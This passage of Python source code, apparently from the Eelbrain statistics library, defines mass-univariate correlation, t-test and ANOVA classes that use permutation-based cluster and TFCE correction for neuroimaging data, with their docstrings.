**criteria):
sub = assub(sub, ds)
y = asndvar(y, sub=sub, ds=ds, dtype=np.float64)
check_for_vector_dim(y)
if not y.has_case:
raise ValueError("Dependent variable needs case dimension")
x = asvar(x, sub=sub, ds=ds)
if norm is not None:
norm = ascategorial(norm, sub, ds)
if match is not None:
match = ascategorial(match, sub, ds)
name = "%s corr %s" % (y.name, x.name)
# Normalize by z-scoring the data for each subject
# normalization is done before the permutation b/c we are interested in
# the variance associated with each subject for the z-scoring.
y = y.copy()
if norm is not None:
for cell in norm.cells:
idx = (norm == cell)
y.x[idx] = scipy.stats.zscore(y.x[idx], None)
# subtract the mean from y and x so that this can be omitted during
# permutation
y -= y.summary('case')
x = x - x.mean()
n = len(y)
df = n - 2
rmap = stats.corr(y.x, x.x)
n_threshold_params = sum((pmin is not None, rmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, rmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.rtest_r(pmin, df)
elif rmin is not None:
threshold = abs(rmin)
else:
threshold = None
cdist = NDPermutationDistribution(
y, samples, threshold, tfce, 0, 'r', name,
tstart, tstop, criteria, parc)
cdist.add_original(rmap)
if cdist.do_permutation:
iterator = permute_order(n, samples, unit=match)
run_permutation(stats.corr, cdist, iterator, x.x)
# compile results
info = _info.for_stat_map('r', threshold)
r = NDVar(rmap, y.dims[1:], info, name)
# store attributes
NDTest.__init__(self, y, match, sub, samples, tfce, pmin, cdist,
tstart, tstop)
self.x = x.name
self.norm = None if norm is None else norm.name
self.rmin = rmin
self.n = n
self.df = df
self.r = r
self._expand_state()
def _expand_state(self):
NDTest._expand_state(self)
r = self.r
# uncorrected probability
pmap = stats.rtest_p(r.x, self.df)
info = _info.for_p_map()
p_uncorrected = NDVar(pmap, r.dims, info, 'p_uncorrected')
self.p_uncorrected = p_uncorrected
self.r_p = [[r, self.p]] if self.samples else None
def _name(self):
if self.y and self.x:
return "Correlation: %s ~ %s" % (self.y, self.x)
else:
return "Correlation"
def _repr_test_args(self):
args = [repr(self.y), repr(self.x)]
if self.norm:
args.append('norm=%r' % self.norm)
return args
def _default_plot_obj(self):
if self.samples:
return self.masked_parameter_map()
else:
return self.r
class NDDifferenceTest(NDTest):
difference = None
def _get_mask(self, p=0.05):
self._assert_has_cdist()
if not 1 >= p > 0:
raise ValueError(f"p={p}: needs to be between 1 and 0")
if p == 1:
if self._cdist.kind != 'cluster':
raise ValueError(f"p=1 is only a valid mask for threshold-based cluster tests")
mask = self._cdist.cluster_map == 0
else:
mask = self.p > p
return self._cdist.uncrop(mask, self.difference, True)
def masked_difference(self, p=0.05, name=None):
"""Difference map masked by significance
Parameters
----------
p : scalar
Threshold p-value for masking (default 0.05). For threshold-based
            cluster tests, ``p=1`` includes all clusters regardless of their
p-value.
name : str
Name of the output NDVar.
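        Examples
        --------
        A minimal, hypothetical usage sketch (``result`` stands for any
        completed difference test):
        >>> sig_difference = result.masked_difference(0.01)  # hypothetical result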
"""
mask = self._get_mask(p)
return self.difference.mask(mask, name=name)
class NDMaskedC1Mixin:
def masked_c1(self, p=0.05):
"""``c1`` map masked by significance of the ``c1``-``c0`` difference
Parameters
----------
p : scalar
Threshold p-value for masking (default 0.05). For threshold-based
            cluster tests, ``p=1`` includes all clusters regardless of their
p-value.
"""
mask = self._get_mask(p)
return self.c1_mean.mask(mask)
class ttest_1samp(NDDifferenceTest):
"""Mass-univariate one sample t-test
Parameters
----------
y : NDVar
Dependent variable.
popmean : scalar
Value to compare y against (default is 0).
match : None | categorial
Combine data for these categories before testing.
sub : index
Perform test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use a t-value equivalent to an
uncorrected p-value.
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
difference : NDVar
The difference value entering the test (``y`` if popmean is 0).
n : int
Number of cases.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
t : NDVar
Map of t-values.
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
Notes
-----
Data points with zero variance are set to t=0.
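    Examples
    --------
    A minimal sketch; ``ds``, ``'uts'`` and ``'subject'`` are hypothetical
    names for a Dataset, an NDVar and a subject Factor:
    >>> result = ttest_1samp('uts', match='subject', ds=ds, samples=1000)  # hypothetical data
    >>> difference = result.masked_difference()  # difference, masked at p > 0.05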
"""
_state_specific = ('popmean', 'tail', 'n', 'df', 't', 'difference')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
popmean: float = 0,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
ct = Celltable(y, match=match, sub=sub, ds=ds, coercion=asndvar, dtype=np.float64)
check_for_vector_dim(ct.y)
n = len(ct.y)
df = n - 1
y = ct.y.summary()
tmap = stats.t_1samp(ct.y.x)
if popmean:
raise NotImplementedError("popmean != 0")
diff = y - popmean
if np.any(diff < 0):
diff.info['cmap'] = 'xpolar'
else:
diff = y
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
if popmean:
y_perm = ct.y - popmean
else:
y_perm = ct.y
n_samples, samples = _resample_params(len(y_perm), samples)
cdist = NDPermutationDistribution(
y_perm, n_samples, threshold, tfce, tail, 't', '1-Sample t-Test',
tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_sign_flip(n, samples)
run_permutation(opt.t_1samp_perm, cdist, iterator)
# NDVar map of t-values
info = _info.for_stat_map('t', threshold, tail=tail, old=ct.y.info)
t = NDVar(tmap, ct.y.dims[1:], info, 't')
# store attributes
NDDifferenceTest.__init__(self, ct.y, ct.match, sub, samples, tfce, pmin, cdist, tstart, tstop)
self.popmean = popmean
self.n = n
self.df = df
self.tail = tail
self.t = t
self.tmin = tmin
self.difference = diff
self._expand_state()
def __setstate__(self, state):
if 'diff' in state:
state['difference'] = state.pop('diff')
NDTest.__setstate__(self, state)
def _expand_state(self):
NDTest._expand_state(self)
t = self.t
pmap = stats.ttest_p(t.x, self.df, self.tail)
info = _info.for_p_map(t.info)
p_uncorr = NDVar(pmap, t.dims, info, 'p')
self.p_uncorrected = p_uncorr
def _name(self):
if self.y:
return "One-Sample T-Test: %s" % self.y
else:
return "One-Sample T-Test"
def _repr_test_args(self):
args = [repr(self.y)]
if self.popmean:
args.append(repr(self.popmean))
if self.match:
args.append('match=%r' % self.match)
if self.tail:
args.append("tail=%i" % self.tail)
return args
def _default_plot_obj(self):
if self.samples:
return self.masked_difference()
else:
return self.difference
class ttest_ind(NDDifferenceTest):
"""Mass-univariate independent samples t-test
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Combine cases with the same cell on ``x % match``.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
        Threshold for forming clusters: use a t-value equivalent to an
        uncorrected p-value.
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
c1_mean : NDVar
Mean in the c1 condition.
c0_mean : NDVar
Mean in the c0 condition.
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
difference : NDVar
Difference between the mean in condition c1 and condition c0.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
t : NDVar
Map of t-values.
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
Notes
-----
Cases with zero variance are set to t=0.
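    Examples
    --------
    A minimal sketch; ``ds``, ``'uts'`` and ``'group'`` are hypothetical names
    for a Dataset, an NDVar and a Factor with cells ``'patient'`` and
    ``'control'``:
    >>> result = ttest_ind('uts', 'group', 'patient', 'control', ds=ds, samples=1000)  # hypothetical data
    >>> difference = result.difference  # patient minus control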
"""
_state_specific = ('x', 'c1', 'c0', 'tail', 't', 'n1', 'n0', 'df', 'c1_mean',
'c0_mean')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: CellArg = None,
c0: CellArg = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
y, y1, y0, c1, c0, match, x_name, c1_name, c0_name = _independent_measures_args(y, x, c1, c0, match, ds, sub, True)
check_for_vector_dim(y)
n1 = len(y1)
n = len(y)
n0 = n - n1
df = n - 2
groups = np.arange(n) < n1
groups.dtype = np.int8
tmap = stats.t_ind(y.x, groups)
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
cdist = NDPermutationDistribution(y, samples, threshold, tfce, tail, 't', 'Independent Samples t-Test', tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_order(n, samples)
run_permutation(stats.t_ind, cdist, iterator, groups)
# store attributes
NDDifferenceTest.__init__(self, y, match, sub, samples, tfce, pmin, cdist, tstart, tstop)
self.x = x_name
self.c0 = c0
self.c1 = c1
self.n1 = n1
self.n0 = n0
self.df = df
self.tail = tail
info = _info.for_stat_map('t', threshold, tail=tail, old=y.info)
self.t = NDVar(tmap, y.dims[1:], info, 't')
self.tmin = tmin
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self._expand_state()
def _expand_state(self):
NDTest._expand_state(self)
# difference
diff = self.c1_mean - self.c0_mean
if np.any(diff.x < 0):
diff.info['cmap'] = 'xpolar'
diff.name = 'difference'
self.difference = diff
# uncorrected p
pmap = stats.ttest_p(self.t.x, self.df, self.tail)
info = _info.for_p_map(self.t.info)
p_uncorr = NDVar(pmap, self.t.dims, info, 'p')
self.p_uncorrected = p_uncorr
# composites
if self.samples:
diff_p = self.masked_difference()
else:
diff_p = self.difference
self.all = [self.c1_mean, self.c0_mean, diff_p]
def _name(self):
cmp = '=><'[self.tail]
desc = f"{self.c1} {cmp} {self.c0}"
if self.y:
desc = f"{self.y} ~ {desc}"
return f"Independent-Samples T-Test: {desc}"
def _plot_model(self):
return self.x
def _plot_sub(self):
return "(%s).isin(%s)" % (self.x, (self.c1, self.c0))
def _repr_test_args(self):
if self.c1 is None:
args = [f'{self.y!r} (n={self.n1})', f'{self.x!r} (n={self.n0})']
else:
args = [f'{self.y!r}', f'{self.x!r}', f'{self.c1!r} (n={self.n1})', f'{self.c0!r} (n={self.n0})']
if self.match:
            args.append(f'match={self.match!r}')
if self.tail:
args.append(f'tail={self.tail}')
return args
def _default_plot_obj(self):
if self.samples:
diff = self.masked_difference()
else:
diff = self.difference
return [self.c1_mean, self.c0_mean, diff]
class ttest_rel(NDMaskedC1Mixin, NDDifferenceTest):
"""Mass-univariate related samples t-test
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Units within which measurements are related (e.g. 'subject' in a
within-subject comparison).
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed, default);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use a t-value equivalent to an
uncorrected p-value.
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
c1_mean : NDVar
Mean in the c1 condition.
c0_mean : NDVar
Mean in the c0 condition.
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
difference : NDVar
Difference between the mean in condition c1 and condition c0.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
t : NDVar
Map of t-values.
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
n : int
Number of cases.
Notes
-----
Also known as dependent t-test, paired t-test or repeated measures t-test.
In the permutation cluster test, permutations are done within the
categories of ``match``.
Cases with zero variance are set to t=0.
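    Examples
    --------
    A minimal sketch; ``ds``, ``'uts'``, ``'condition'`` and ``'subject'`` are
    hypothetical names for a Dataset, an NDVar and two Factors:
    >>> result = ttest_rel('uts', 'condition', 'a', 'b', match='subject', ds=ds, samples=1000)  # hypothetical data
    >>> difference = result.masked_difference()  # a minus b, masked at p > 0.05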
"""
_state_specific = ('x', 'c1', 'c0', 'tail', 't', 'n', 'df', 'c1_mean',
'c0_mean')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: CellArg = None,
c0: CellArg = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
y1, y0, c1, c0, match, n, x_name, c1, c1_name, c0, c0_name = _related_measures_args(y, x, c1, c0, match, ds, sub, True)
check_for_vector_dim(y1)
if n <= 2:
raise ValueError("Not enough observations for t-test (n=%i)" % n)
df = n - 1
diff = y1 - y0
tmap = stats.t_1samp(diff.x)
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
n_samples, samples = _resample_params(len(diff), samples)
cdist = NDPermutationDistribution(
diff, n_samples, threshold, tfce, tail, 't', 'Related Samples t-Test',
tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_sign_flip(n, samples)
run_permutation(opt.t_1samp_perm, cdist, iterator)
# NDVar map of t-values
info = _info.for_stat_map('t', threshold, tail=tail, old=y1.info)
t = NDVar(tmap, y1.dims[1:], info, 't')
# store attributes
NDDifferenceTest.__init__(self, y1, match, sub, samples, tfce, pmin, cdist, tstart, tstop)
self.x = x_name
self.c0 = c0
self.c1 = c1
self.n = n
self.df = df
self.tail = tail
self.t = t
self.tmin = tmin
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self._expand_state()
def _expand_state(self):
NDTest._expand_state(self)
cdist = self._cdist
t = self.t
# difference
diff = self.c1_mean - self.c0_mean
if np.any(diff.x < 0):
diff.info['cmap'] = 'xpolar'
diff.name = 'difference'
self.difference = diff
# uncorrected p
pmap = stats.ttest_p(t.x, self.df, self.tail)
info = _info.for_p_map()
self.p_uncorrected = NDVar(pmap, t.dims, info, 'p')
# composites
if self.samples:
diff_p = self.masked_difference()
else:
diff_p = self.difference
self.all = [self.c1_mean, self.c0_mean, diff_p]
def _name(self):
if self.tail == 0:
comp = "%s == %s" % (self.c1, self.c0)
elif self.tail > 0:
comp = "%s > %s" % (self.c1, self.c0)
else:
comp = "%s < %s" % (self.c1, self.c0)
if self.y:
return "Related-Samples T-Test: %s ~ %s" % (self.y, comp)
else:
return "Related-Samples T-Test: %s" % comp
def _plot_model(self):
return self.x
def _plot_sub(self):
return "(%s).isin(%s)" % (self.x, (self.c1, self.c0))
def _repr_test_args(self):
args = [repr(self.y), repr(self.x)]
if self.c1 is not None:
args.extend((repr(self.c1), repr(self.c0), repr(self.match)))
args[-1] += " (n=%i)" % self.n
if self.tail:
args.append("tail=%i" % self.tail)
return args
def _default_plot_obj(self):
if self.samples:
diff = self.masked_difference()
else:
diff = self.difference
return [self.c1_mean, self.c0_mean, diff]
class MultiEffectNDTest(NDTest):
def _repr_test_args(self):
args = [repr(self.y), repr(self.x)]
if self.match is not None:
args.append('match=%r' % self.match)
return args
def _repr_cdist(self):
args = self._cdist[0]._repr_test_args(self.pmin)
for cdist in self._cdist:
effect_args = cdist._repr_clusters()
args.append("%r: %s" % (cdist.name, ', '.join(effect_args)))
return args
def _asfmtext(self):
table = fmtxt.Table('llll')
table.cells('Effect', fmtxt.symbol(self._statistic, 'max'), fmtxt.symbol('p'), 'sig')
table.midrule()
for i, effect in enumerate(self.effects):
table.cell(effect)
table.cell(fmtxt.stat(self._max_statistic(i)))
pmin = self.p[i].min()
table.cell(fmtxt.p(pmin))
table.cell(star(pmin))
return table
def _expand_state(self):
self.effects = tuple(e.name for e in self._effects)
# clusters
cdists = self._cdist
if cdists is None:
self._kind = None
else:
self.tfce_maps = [cdist.tfce_map for cdist in cdists]
self.p = [cdist.probability_map for cdist in cdists]
self._kind = cdists[0].kind
def _effect_index(self, effect: Union[int, str]):
if isinstance(effect, str):
return self.effects.index(effect)
else:
return effect
def _iter_cdists(self):
for cdist in self._cdist:
yield cdist.name.capitalize(), cdist
@property
def _first_cdist(self):
if self._cdist is None:
return None
else:
return self._cdist[0]
def _max_statistic(self, effect: Union[str, int]):
i = self._effect_index(effect)
stat_map = self._statistic_map[i]
tail = getattr(self, 'tail', self._statistic_tail)
return self._max_statistic_from_map(stat_map, self.p[i], tail)
def cluster(self, cluster_id, effect=0):
"""Retrieve a specific cluster as NDVar
Parameters
----------
cluster_id : int
Cluster id.
effect : int | str
Index or name of the effect from which to retrieve a cluster
(default is the first effect).
Returns
-------
cluster : NDVar
NDVar of the cluster, 0 outside the cluster.
Notes
-----
Clusters only have stable ids for thresholded cluster distributions.
"""
self._assert_has_cdist()
i = self._effect_index(effect)
return self._cdist[i].cluster(cluster_id)
def compute_probability_map(self, effect=0, **sub):
"""Compute a probability map
Parameters
----------
effect : int | str
Index or name of the effect from which to use the parameter map
(default is the first effect).
Returns
-------
probability : NDVar
Map of p-values.
"""
self._assert_has_cdist()
i = self._effect_index(effect)
return self._cdist[i].compute_probability_map(**sub)
def masked_parameter_map(self, effect=0, pmin=0.05, **sub):
"""Create a copy of the parameter map masked by significance
Parameters
----------
effect : int | str
Index or name of the effect from which to use the parameter map.
pmin : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
Returns
-------
masked_map : NDVar
NDVar with data from the original parameter map wherever p <= pmin
and 0 everywhere else.
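        Examples
        --------
        Hypothetical usage, assuming a completed multi-effect test ``result``
        with an effect named ``'A'``:
        >>> masked_f = result.masked_parameter_map('A', pmin=0.01)  # hypothetical result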
"""
self._assert_has_cdist()
i = self._effect_index(effect)
return self._cdist[i].masked_parameter_map(pmin, **sub)
def find_clusters(self, pmin=None, maps=False, effect=None, **sub):
"""Find significant regions or clusters
Parameters
----------
pmin : None | scalar, 1 >= p >= 0
Threshold p-value. For threshold-based tests, all clusters with a
p-value smaller than ``pmin`` are included (default 1);
for other tests, find contiguous regions with ``p ≤ pmin`` (default
0.05).
maps : bool
Include in the output a map of every cluster (can be memory
intensive if there are large statistical maps and/or many
clusters; default ``False``).
effect : int | str
Index or name of the effect from which to find clusters (default is
all effects).
Returns
-------
ds : Dataset
Dataset with information about the clusters.
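        Examples
        --------
        Hypothetical usage, assuming a completed multi-effect test ``result``
        with an effect named ``'A'``:
        >>> clusters = result.find_clusters(0.05, effect='A')  # hypothetical result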
"""
self._assert_has_cdist()
if effect is not None:
i = self._effect_index(effect)
cdist = self._cdist[i]
ds = cdist.clusters(pmin, maps, **sub)
ds[:, 'effect'] = cdist.name
return ds
dss = [self.find_clusters(pmin, maps, i, **sub) for i in range(len(self.effects))]
info = {}
for ds, cdist in zip(dss, self._cdist):
if 'clusters' in ds.info:
info[f'{cdist.name} clusters'] = ds.info.pop('clusters')
out = combine(dss)
out.info.update(info)
return out
def find_peaks(self):
"""Find peaks in a TFCE distribution
Returns
-------
ds : Dataset
Dataset with information about the peaks.
"""
self._assert_has_cdist()
dss = []
for cdist in self._cdist:
ds = cdist.find_peaks()
ds[:, 'effect'] = cdist.name
dss.append(ds)
return combine(dss)
class anova(MultiEffectNDTest):
"""Mass-univariate ANOVA
Parameters
----------
y : NDVar
Dependent variable.
x : Model
Independent variables.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use an f-value equivalent to an
uncorrected p-value.
fmin : scalar
Threshold for forming clusters as f-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
        step of TFCE levels (when ``tfce=True``, a step of 0.1 is used).
replacement : bool
        Whether random samples should be drawn with replacement or without.
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
match : categorial | False
When permuting data, only shuffle the cases within the categories
of match. By default, ``match`` is determined automatically based on
        the random effects structure of ``x``.
parc : str
Collect permutation statistics for all regions of the parcellation of
        this dimension. For threshold-based tests, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
effects : tuple of str
Names of the tested effects, in the same order as in other attributes.
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
f : list of NDVar
Maps of F values.
p : list of NDVar | None
Maps of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : list of NDVar
Maps of p-values uncorrected for multiple comparison.
tfce_maps : list of NDVar | None
Maps of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
Examples
--------
For information on model specification see the univariate
:func:`~eelbrain.test.anova` examples.
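    A minimal sketch; ``ds``, ``'uts'``, ``'A'``, ``'B'`` and ``'subject'`` are
    hypothetical names for a Dataset, an NDVar, two fixed Factors and a random
    subject Factor:
    >>> result = anova('uts', 'A * B * subject', ds=ds, samples=1000)  # hypothetical data
    >>> result.table()  # smallest p-value per effect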
"""
_state_specific = ('x', 'pmin', '_effects', '_dfs_denom', 'f')
_statistic = 'f'
_statistic_tail = 1
@user_activity
def __init__(
self,
y: NDVarArg,
x: ModelArg,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
pmin: float = None,
fmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
match: Union[CategorialArg, bool] = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
x_arg = x
sub_arg = sub
sub = assub(sub, ds)
y = asndvar(y, sub, ds, dtype=np.float64)
check_for_vector_dim(y)
x = asmodel(x, sub, ds)
if match is None:
random_effects = [e for e in x.effects if e.random]
if not random_effects:
match = None
elif len(random_effects) > 1:
raise NotImplementedError(
"Automatic match parameter for model with more than one "
"random effect. Set match manually.")
else:
match = random_effects[0]
elif match is not False:
match = ascategorial(match, sub, ds)
lm = _nd_anova(x)
effects = lm.effects
dfs_denom = lm.dfs_denom
fmaps = lm.map(y.x)
n_threshold_params = sum((pmin is not None, fmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
cdists = None
thresholds = tuple(repeat(None, len(effects)))
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, fmin and tfce can be specified")
else:
if pmin is not None:
thresholds = tuple(stats.ftest_f(pmin, e.df, df_den) for e, df_den in zip(effects, dfs_denom))
elif fmin is not None:
thresholds = tuple(repeat(abs(fmin), len(effects)))
else:
thresholds = tuple(repeat(None, len(effects)))
cdists = [
NDPermutationDistribution(
y, samples, thresh, tfce, 1, 'f', e.name,
tstart, tstop, criteria, parc, force_permutation)
for e, thresh in zip(effects, thresholds)]
# Find clusters in the actual data
do_permutation = 0
for cdist, fmap in zip(cdists, fmaps):
cdist.add_original(fmap)
do_permutation += cdist.do_permutation
if do_permutation:
iterator = permute_order(len(y), samples, unit=match)
run_permutation_me(lm, cdists, iterator)
# create ndvars
dims = y.dims[1:]
f = []
for e, fmap, df_den, f_threshold in zip(effects, fmaps, dfs_denom, thresholds):
info = _info.for_stat_map('f', f_threshold, tail=1, old=y.info)
f.append(NDVar(fmap, dims, info, e.name))
# store attributes
MultiEffectNDTest.__init__(self, y, match, sub_arg, samples, tfce, pmin,
cdists, tstart, tstop)
self.x = x_arg if isinstance(x_arg, str) else x.name
self._effects = effects
self._dfs_denom = dfs_denom
self.f = f
self._expand_state()
def _expand_state(self):
# backwards compatibility
if hasattr(self, 'effects'):
self._effects = self.effects
MultiEffectNDTest._expand_state(self)
# backwards compatibility
if hasattr(self, 'df_den'):
df_den_temp = {e.name: df for e, df in self.df_den.items()}
del self.df_den
self._dfs_denom = tuple(df_den_temp[e] for e in self.effects)
# f-maps with clusters
pmin = self.pmin or 0.05
if self.samples:
f_and_clusters = []
for e, fmap, df_den, cdist in zip(self._effects, self.f,
self._dfs_denom, self._cdist):
# create f-map with cluster threshold
f0 = stats.ftest_f(pmin, e.df, df_den)
info = _info.for_stat_map('f', f0)
f_ = NDVar(fmap.x, fmap.dims, info, e.name)
# add overlay with cluster
if cdist.probability_map is not None:
f_and_clusters.append([f_, cdist.probability_map])
else:
f_and_clusters.append([f_])
self.f_probability = f_and_clusters
# uncorrected probability
p_uncorr = []
for e, f, df_den in zip(self._effects, self.f, self._dfs_denom):
info = _info.for_p_map()
pmap = stats.ftest_p(f.x, e.df, df_den)
p_ = NDVar(pmap, f.dims, info, e.name)
p_uncorr.append(p_)
self.p_uncorrected = p_uncorr
def _name(self):
if self.y:
return "ANOVA: %s ~ %s" % (self.y, self.x)
else:
return "ANOVA: %s" % self.x
def _plot_model(self):
return '%'.join(e.name for e in self._effects if isinstance(e, Factor) or
(isinstance(e, NestedEffect) and isinstance(e.effect, Factor)))
def _plot_sub(self):
return super(anova, self)._plot_sub()
def _default_plot_obj(self):
if self.samples:
return [self.masked_parameter_map(e) for e in self.effects]
else:
